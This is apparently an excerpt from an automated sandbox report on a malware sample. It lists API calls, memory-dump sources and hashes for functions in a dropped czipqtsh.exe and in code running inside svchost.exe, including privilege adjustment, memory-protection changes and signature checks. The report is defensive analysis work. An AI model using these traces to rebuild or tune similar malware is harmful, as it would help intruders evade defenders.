GetProcessHeap.KERNEL32(00000008,?,00401D53,00001000,00000000,00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C7F
RtlAllocateHeap.NTDLL(00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C86

Memory Dump Source

Source File: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.2950571942.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950609629.0000000000402000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950628830.0000000000403000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950647024.0000000000404000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_czipqtsh.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction ID: bbb82e670732032ebf8e303bc8a39f8b906a07d9cff939e05880545c35f94fa9
Opcode Fuzzy Hash: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction Fuzzy Hash: 9EB00275546240EBDE416FE59F0DA097E7DBB84743F008454B349E5064CA758514DB25

Uniqueness

Uniqueness Score: -1.00%

Function 020903A1 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 020903DA

Memory Dump Source

Source File: 0000001B.00000002.2951158007.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2090000_czipqtsh.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction ID: 1a6bd088b16c8deb3158d0d80a94354464e9a5466748cb6a7d1f65d87d3b6f21
Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction Fuzzy Hash: 7D01D8B3A043156BFF218A19DC80B6A73AEEFC5724F19C525FD07E7240C674D841B5A0

Uniqueness

Uniqueness Score: -1.00%

Function 00401593 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00401442,00401295), ref: 004015AA

Memory Dump Source

Source File: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.2950571942.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950609629.0000000000402000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950628830.0000000000403000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950647024.0000000000404000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_czipqtsh.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction ID: 98ea57f8acb340bf8185d7c41957bfe50ebb8c53553d8a1b8998a7004bdb3259
Opcode Fuzzy Hash: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction Fuzzy Hash: 47D05E33C0830C5ACB04EBF19A0E8CD77FC9B0C214F1004A6E505B2080FA76EA5883A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401264 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000, /p=,00401033,00000000), ref: 0040126D
StrToIntA.SHLWAPI(-00000004), ref: 0040127B
GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe,00000104), ref: 004012A1

Strings

/p=, xrefs: 00401264
C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe, xrefs: 0040129A

Memory Dump Source

Source File: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.2950571942.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950609629.0000000000402000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950628830.0000000000403000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950647024.0000000000404000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_czipqtsh.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: /p=$C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe
API String ID: 514040917-3705783577
Opcode ID: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction ID: a97e36b21e4f6c4b508bbe1c7bc1ce47f756939332ff9af57f8a63180c09d7ad
Opcode Fuzzy Hash: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction Fuzzy Hash: EAE048B068130177EA502F719E0FB156A985B08B4FF544476BA45F41F5DAFCC241451D

Uniqueness

Uniqueness Score: -1.00%

Function 00401305 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,0040128B), ref: 0040130B
RtlAllocateHeap.NTDLL ref: 00401387

Strings

NTDLL.DLL, xrefs: 00401306

Memory Dump Source

Source File: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.2950571942.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950609629.0000000000402000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950628830.0000000000403000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950647024.0000000000404000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_czipqtsh.jbxd

Yara matches

Similarity

API ID: AllocateHandleHeapModule
String ID: NTDLL.DLL
API String ID: 3205619-1613819793
Opcode ID: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction ID: 661fe251d33bcd873fe0306d0fa480983da9c30ce6244cc3b298440f3ea03910
Opcode Fuzzy Hash: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction Fuzzy Hash: 5E213EA5B9079479E13025761E8EF2759AD85E6F99360817FBB04B21D6D8FC4C04C06C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exePID: 6728, Parent PID: 2904COMMON

Executed Functions

Function 02A52BA4 Relevance: 3.1, APIs: 2, Instructions: 58
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02A52BDA
NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02A52C23

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d4ead35cd19d3c79e9ea9092376fb80021319333ecdb19891a572cdbe92607c2
Instruction ID: a886d49d5e20da57880732a2494599b20d50267d78e1bf0f49b167207d9395a1
Opcode Fuzzy Hash: d4ead35cd19d3c79e9ea9092376fb80021319333ecdb19891a572cdbe92607c2
Instruction Fuzzy Hash: 2D11CD36910115AFCB09CF58C994EEA77B4FF4C324F1542ADE9254B291DF31EA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02A5338D Relevance: 19.7, APIs: 13, Instructions: 156
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,0000011C), ref: 02A533BE
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 02A533E0
GetLastError.KERNEL32 ref: 02A533E2
GetProcessHeap.KERNEL32(00000008,?), ref: 02A53401
RtlAllocateHeap.NTDLL(00000000), ref: 02A53408
GetTokenInformation.KERNELBASE(?,00000002,00000000,?,?), ref: 02A53428
GetSidIdentifierAuthority.ADVAPI32(?), ref: 02A53448
GetSidSubAuthorityCount.ADVAPI32(?), ref: 02A5346B
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 02A53480
GetSidSubAuthority.ADVAPI32(?,?), ref: 02A53497
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02A5351A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A53527
HeapFree.KERNEL32(00000000), ref: 02A5352E

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: AuthorityHeap$ProcessToken$Information$AllocateChangeCloseCountErrorFindFreeIdentifierLastNotificationOpen
String ID:
API String ID: 3355550324-0
Opcode ID: 99ae242862dfc3df73e5d8e53d9e577e09905d965e5e7811e6fe9c97a5cf4bba
Instruction ID: a1dbe398f519f0802f032463c99f6b1048edc4a74fbb8f0007aecaf4ab965de1
Opcode Fuzzy Hash: 99ae242862dfc3df73e5d8e53d9e577e09905d965e5e7811e6fe9c97a5cf4bba
Instruction Fuzzy Hash: B551BA315443219FDB128F29D889B6BBBE4FF86391F084988F88593251DF31D549CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02A53555 Relevance: 15.1, APIs: 10, Instructions: 76
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02A53570
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02A53585
GetLastError.KERNEL32 ref: 02A5358B
GetProcessHeap.KERNEL32(00000008,00000001), ref: 02A535A1
RtlAllocateHeap.NTDLL(00000000), ref: 02A535A8
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02A535C1
GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 02A535CF
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02A535F0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A535FD
HeapFree.KERNEL32(00000000), ref: 02A53604

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessToken$Information$AllocateAuthorityChangeCloseErrorFindFreeLastNotificationOpen
String ID:
API String ID: 1063018014-0
Opcode ID: 43ecd4899fc1f680027892b10fc8698b345480edd1c225c866afb1b282184baf
Instruction ID: df3029040d2e968551666cc6c5114a878e7fcb0c997d53d10e5acc1c6808d852
Opcode Fuzzy Hash: 43ecd4899fc1f680027892b10fc8698b345480edd1c225c866afb1b282184baf
Instruction Fuzzy Hash: 8C214931940224AFEF218BA5DC49BAFBA78FF81796F140594F901E6090CF31CA55EA60

Uniqueness

Uniqueness Score: -1.00%

Function 02A54068 Relevance: 12.1, APIs: 8, Instructions: 63
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000009,?,02A5373D,?,00100000,00000006,?), ref: 02A5406D
RtlAllocateHeap.NTDLL(00000000,?,02A5373D), ref: 02A54074
CreateFileMappingW.KERNELBASE(000000FF,02A562B8,00000004,00000000,?,?,?,?,?,02A5373D,?,00100000,00000006,?), ref: 02A5409B
GetLastError.KERNEL32(?,?,?,02A5373D,?,00100000,00000006,?), ref: 02A540A7
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,?,?,?,?,02A5373D,?,00100000,00000006,?), ref: 02A540C6
CloseHandle.KERNEL32(00000000,?,?,?,02A5373D,?,00100000,00000006,?), ref: 02A540D5
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,02A5373D,?,00100000,00000006,?), ref: 02A540DE
HeapFree.KERNEL32(00000000,?,?,?,02A5373D,?,00100000,00000006,?), ref: 02A540E5

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$AllocateCloseCreateErrorFreeHandleLastMappingView
String ID:
API String ID: 3951456143-0
Opcode ID: 32e9df843e4fd07db6f6d9f2115d751649fd96e387ab2144f19a89b79e0c76db
Instruction ID: 3225740bfad388f1426d953ab053652f0dc70841948fce08515192b1cd213c5b
Opcode Fuzzy Hash: 32e9df843e4fd07db6f6d9f2115d751649fd96e387ab2144f19a89b79e0c76db
Instruction Fuzzy Hash: 23116075684322AFD7208F64AC48F17BBE8FF08711F118818FA55E6291DF30D855CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02A526ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02A52709
RtlGetVersion.NTDLL(?), ref: 02A5271E

Part of subcall function 02A53641: GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02A52790), ref: 02A53659

Strings

f<v, xrefs: 02A527BD

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersionmemset
String ID: f<v
API String ID: 487673674-2911902482
Opcode ID: e7890d460555c1eb3b7075aedd2858180c4693b4efb38b9d69f219f599163f46
Instruction ID: f3b86b6bc5897075fd903d4c1df76b6f83004a5d5f07b7edeb7854d151a83ea5
Opcode Fuzzy Hash: e7890d460555c1eb3b7075aedd2858180c4693b4efb38b9d69f219f599163f46
Instruction Fuzzy Hash: F321F835CC43B89AD7109B74A8416DFFF7CAB56B00F8408D9DD4453202DD708567CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A52833 Relevance: 4.6, APIs: 3, Instructions: 73
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExW.KERNELBASE(00000000,?,?,?,00000005), ref: 02A52858
LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02A5287E
GetSystemTimeAsFileTime.KERNEL32(?,?,00000005), ref: 02A528A3

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: NameTime$AccountComputerFileLookupSystem
String ID:
API String ID: 3076100934-0
Opcode ID: ad92908e845fd27e82ffd0ef87114ccf2d761e61996d063c4182d5ae2c9e327b
Instruction ID: 6ac7e001d856d755ab68016c3e1af72790fe1d7e0531b19117ef1a3965578d55
Opcode Fuzzy Hash: ad92908e845fd27e82ffd0ef87114ccf2d761e61996d063c4182d5ae2c9e327b
Instruction Fuzzy Hash: B82139729403689BCB65CF65E884ADFBBECEF05714B40022AFC15D2242DB74D95ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A52674 Relevance: 4.5, APIs: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008007), ref: 02A52679

Part of subcall function 02A52973: lstrcpyW.KERNEL32(02A562F2,02A563B4), ref: 02A5298C
Part of subcall function 02A52973: lstrcatW.KERNEL32(02A562F0,02A57338), ref: 02A5299C
Part of subcall function 02A52973: SetUnhandledExceptionFilter.KERNEL32(Function_000017E8), ref: 02A529A7

Part of subcall function 02A526ED: memset.MSVCRT ref: 02A52709
Part of subcall function 02A526ED: RtlGetVersion.NTDLL(?), ref: 02A5271E

Part of subcall function 02A53555: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02A53570
Part of subcall function 02A53555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02A53585
Part of subcall function 02A53555: GetLastError.KERNEL32 ref: 02A5358B
Part of subcall function 02A53555: GetProcessHeap.KERNEL32(00000008,00000001), ref: 02A535A1
Part of subcall function 02A53555: RtlAllocateHeap.NTDLL(00000000), ref: 02A535A8
Part of subcall function 02A53555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02A535C1
Part of subcall function 02A53555: GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 02A535CF
Part of subcall function 02A53555: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02A535F0
Part of subcall function 02A53555: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A535FD
Part of subcall function 02A53555: HeapFree.KERNEL32(00000000), ref: 02A53604

ExitProcess.KERNEL32 ref: 02A526E6

Part of subcall function 02A525E3: lstrcpyW.KERNEL32(?,02A57328), ref: 02A525F6
Part of subcall function 02A525E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02A52612
Part of subcall function 02A525E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02A52623
Part of subcall function 02A525E3: GetLastError.KERNEL32 ref: 02A5262D

Part of subcall function 02A52C33: StrStrIW.SHLWAPI(02A563B4,?), ref: 02A52C67

Part of subcall function 02A51BB9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A51BFF
Part of subcall function 02A51BB9: HeapFree.KERNEL32(00000000), ref: 02A51C06

Part of subcall function 02A51FE9: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A51FF0
Part of subcall function 02A51FE9: CreateThread.KERNEL32(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02A52009
Part of subcall function 02A51FE9: CloseHandle.KERNEL32(00000000), ref: 02A52014

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Create$ErrorEventToken$CloseFreeInformationLastlstrcpy$AllocateAuthorityChangeExceptionExitFilterFindHandleModeNotificationOpenThreadUnhandledVersionlstrcatmemset
String ID:
API String ID: 4044000573-0
Opcode ID: f7904caf9147bd7bbd1484c16bbb3f92e5815d6ff05e8ce4bba3770da56cbe31
Instruction ID: b931f82fb65a03837c1ccac8548f44f691451a0989652910ad98421d4e856d1f
Opcode Fuzzy Hash: f7904caf9147bd7bbd1484c16bbb3f92e5815d6ff05e8ce4bba3770da56cbe31
Instruction Fuzzy Hash: 7AF06DA06C03329EFF4477F99F45B2F229A9F94346F0408A1BE45E5595DF34D4614D32

Uniqueness

Uniqueness Score: -1.00%

Function 02A529F5 Relevance: 3.1, APIs: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fbc1ee76606320ab947272b696bb0928f6ce8e5864cfb5784925fb23b64362d
Instruction ID: 75762b8a08ead4f9bbd11f0e0dfd0f9f835e862276d09036b5b9a2f4b18e65ec
Opcode Fuzzy Hash: 4fbc1ee76606320ab947272b696bb0928f6ce8e5864cfb5784925fb23b64362d
Instruction Fuzzy Hash: 6F512476644312AFE314CF24D890BABB3B8EB88714F56486DFE56C7251EB30E944CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02A53641 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02A52790), ref: 02A53659

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 48b6751d896dd94e92da9be1431d9c0dd86e2731230bedb8c424ff2d9d37f2ba
Instruction ID: 245b11ab63cb3efbbd78a93f698d57227680861b370467a3fc3ef4c247dfaf3c
Opcode Fuzzy Hash: 48b6751d896dd94e92da9be1431d9c0dd86e2731230bedb8c424ff2d9d37f2ba
Instruction Fuzzy Hash: 3AD0C233A1422C66CB00A6B9AD099CBF7FC9B8C620F0049A6E501F7140E861999542E0

Uniqueness

Uniqueness Score: -1.00%

Function 02A529AE Relevance: 1.3, APIs: 1, Instructions: 22
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02A52BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02A52BDA
Part of subcall function 02A52BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02A52C23

Sleep.KERNEL32(000000FF), ref: 02A529E9

Part of subcall function 02A52674: SetErrorMode.KERNELBASE(00008007), ref: 02A52679

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual$ErrorModeSleep
String ID:
API String ID: 46048798-0
Opcode ID: 27ac31482e97e94dccfb1dc5a2227184db722299c436f65c0f63b44989d51503
Instruction ID: b7845759f1f409629f310b5118174e50ddb8b87620d2b29dbcd18587e390df47
Opcode Fuzzy Hash: 27ac31482e97e94dccfb1dc5a2227184db722299c436f65c0f63b44989d51503
Instruction Fuzzy Hash: D0E01A32950231CFDA91AB789E88B9772F56F08710F060A61AD218B394DF30C881CB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02A53E7E Relevance: 12.1, APIs: 8, Instructions: 70encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,02A573C8,00000001,F0000000,00000094,?), ref: 02A53EA1
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,00000001), ref: 02A53EBE
CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 02A53ED4
CryptImportKey.ADVAPI32(?,00000000,00000094,00000000,00000000,?), ref: 02A53EF1
CryptVerifySignatureA.ADVAPI32(?,00000000,00000080,00000000,00000000,00000000), ref: 02A53F0D
CryptDestroyKey.ADVAPI32(?), ref: 02A53F18
CryptDestroyHash.ADVAPI32(?), ref: 02A53F26
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02A53F30

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportReleaseSignatureVerify
String ID:
API String ID: 972346567-0
Opcode ID: 0c5c7f627f7aadb1150695a2046fc69534b8ffc8a54d4d8c87cbb565cab461cf
Instruction ID: 6d3a886d9cfdc3c13991ce3348a6b686971ac5ba6d924066b09cd9c02029a766
Opcode Fuzzy Hash: 0c5c7f627f7aadb1150695a2046fc69534b8ffc8a54d4d8c87cbb565cab461cf
Instruction Fuzzy Hash: 2821E436D40268BBCB219B95DC08E9FFFBAEF84B51F004595FA01B6160DB318A25EB50

Uniqueness

Uniqueness Score: -1.00%

Function 02A52F1A Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(02A57658,00000000,00000000,00000001,F0000000,02A562B0,?,?,?,02A55B88,?,00000000,?,?,02A57658,?), ref: 02A52F35
CryptCreateHash.ADVAPI32(02A57658,00008003,00000000,00000000,?,00000000,?,?,?,02A55B88,?,00000000,?,?,02A57658,?), ref: 02A52F52
CryptHashData.ADVAPI32(?,02A57658,?,00000000,?,?,?,02A55B88,?,00000000,?,?,02A57658,?), ref: 02A52F68
CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02A55B88,?,00000000,?,?,02A57658,?), ref: 02A52F83
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02A55B88,?,00000000,?), ref: 02A52FA3
CryptDestroyHash.ADVAPI32(?,?,?,?,02A55B88,?,00000000,?,?,02A57658,?), ref: 02A52FB3
CryptReleaseContext.ADVAPI32(02A57658,00000000,?,?,?,02A55B88,?,00000000,?,?,02A57658,?), ref: 02A52FC2

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDestroyParamRelease
String ID:
API String ID: 276068997-0
Opcode ID: a73a3137ee1ec4d69446633026301ba36eed7a58c47b547abc2d58f15b05f56d
Instruction ID: ecbc762fb3bc649e42249c5f088881cb1ab02687827a22719380110634a91941
Opcode Fuzzy Hash: a73a3137ee1ec4d69446633026301ba36eed7a58c47b547abc2d58f15b05f56d
Instruction Fuzzy Hash: 61210872940229BFDB118F90ED85AAFBBBDEF04755F0045A6FE01B2150DB318E249BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A539E8 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,02A51210,?,02A571F0,?), ref: 02A539F4
OpenProcessToken.ADVAPI32(00000000,?,02A51210,?,02A571F0,?), ref: 02A539FB
LookupPrivilegeValueA.ADVAPI32(00000000,02A571F0,02A51210), ref: 02A53A11
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02A53A36
CloseHandle.KERNEL32(?,?,?,?,02A51210,?,02A571F0,?), ref: 02A53A41

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 9048b76b3d0ab02025a944481c5284e19e0c38e9825f78c96ec23e2c15195610
Instruction ID: 7d564dfb3992b8bef76f8f1ed2a05c9ece20f62f2c89a495fb1505216a87db07
Opcode Fuzzy Hash: 9048b76b3d0ab02025a944481c5284e19e0c38e9825f78c96ec23e2c15195610
Instruction Fuzzy Hash: E4F01D76D00228BBDB209BA5DD4CDAFBAFCEB89B50F000595BD05E2100DB318E15CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A54794 Relevance: 15.1, APIs: 10, Instructions: 143
filesleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064,?,?,?,?), ref: 02A54830
CreateEventW.KERNEL32(02A562B8,00000000,00000000,?,?,?,?,?), ref: 02A54852
CreateFileMappingW.KERNEL32(000000FF,02A562B8,00000004,00000000,?,?,?,?,?,?), ref: 02A54886
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,?,?,?), ref: 02A5489D
SetEvent.KERNEL32(00000000,?,?,?,?), ref: 02A548D9
WaitForSingleObject.KERNEL32(?,00000BB8,?,?,?,?), ref: 02A548EC
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?), ref: 02A548F3
CloseHandle.KERNEL32(?,?,?,?,?), ref: 02A54903
CloseHandle.KERNEL32(?,?,?,?,?), ref: 02A54910
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 02A54917

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

